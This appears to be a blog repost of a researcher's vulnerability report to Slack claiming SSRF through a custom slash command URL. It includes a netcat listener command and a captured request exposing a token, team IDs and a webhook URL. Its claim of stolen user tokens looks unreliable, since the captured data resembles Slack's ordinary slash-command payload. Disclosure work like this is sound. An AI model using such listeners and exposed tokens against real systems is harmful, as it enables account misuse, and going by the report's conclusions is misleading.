SSRF (Server Site Request Forgery)on slack.com – SQLi Basic

Hi Slack Security Team,

Here is Shaifullah Shaon (Black_EyE), An Ethical Hacker.
a white hat cyber security researcher from Bangladesh reporting a serious
[3’rd ranking in OWASP] security vulnerability on your system.

I faced a technical security bug called “SSRF (Server Site Request Forgery)on slack.com”.

Now I exploited it. If you verify more, so you can see my video poc that was unlisted my youtube channel.

Let’s follow me,

1. I already Open my Account.
2. I was create an app which I installed into my cheat box.
3. Now I use /comamnd which I was set a url http://scanme.nmap.org:22
4. Now I put /comma (Slash command) on message box.
   SSRF Testing APP 10:39 AM
   Only visible to you
   SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
   As you see, Here showing The Open SSH Version.
5. Now I am change website url from http://scanme.nmap.org:22 to 31.208.61.136 (This is my Own ssh) and use my 55 Port.
6. Now again put /comma (Slash command) on message box.
7. As you see here, Slack message box showing me 503 (Timeout was reached). But Here see my ssh. I was forwarded my 55 no port using netcat.
    nc -lnvvp 55
    listening on [::]:55 …
   here was port listing, Now when see the 503 (Timeout was reached) from message box, Here I get user token from your server.
   token=KYfpmy2m8mSBrElI1lB8SR8a&team_id=T699WGVQS&team_domain=testdevopsdaveteam&channel_id=D6AKZDF6W&channel_name=directmessage&
   user_id=U6APVADK7&user_name=testingfuck&command=%2Fcomma&text=&
   response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT699WGVQS%2F215699702339%2F1OUns1YkN1jhXulMpjHVgG5x

POST / HTTP/1.1
User-Agent: Slackbot 1.0 (+https://api.slack.com/robots)
Accept-Encoding: gzip,deflate
Accept: application/json,*/*
Content-Length: 298
Content-Type: application/x-www-form-urlencoded
Host: 31.208.61.136:55
Cache-Control: max-age=259200
Connection: keep-alive

token=KYfpmy2m8mSBrElI1lB8SR8a&team_id=T699WGVQS&team_domain=testdevopsdaveteam&channel_id=D6AKZDF6W&channel_name=directmessage&user_id=U6APVADK7&user_name=testingfuck&command=%2Fcomma&text=&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT699WGVQS%2F215699702339%2F1OUns1YkN1jhXulMpjHVgG5x
  
  
** Note: An attacker can stole user token using this issue.

Please See my Video Poc for understand clearly. Hopefully Those are Very critical issue.
Resolve those issue as soon as possible.

Here is proof as video concept (unlisted): https://youtu.be/REV3IG5qGFc

Thank you
Shaifullah Shaon (Black_EyE)
shaon.durjoy@gmail.com

It’s an Online It Section
Please Subscribe us.




Leave a Reply

Your email address will not be published. Required fields are marked *

Name *
Email *
Website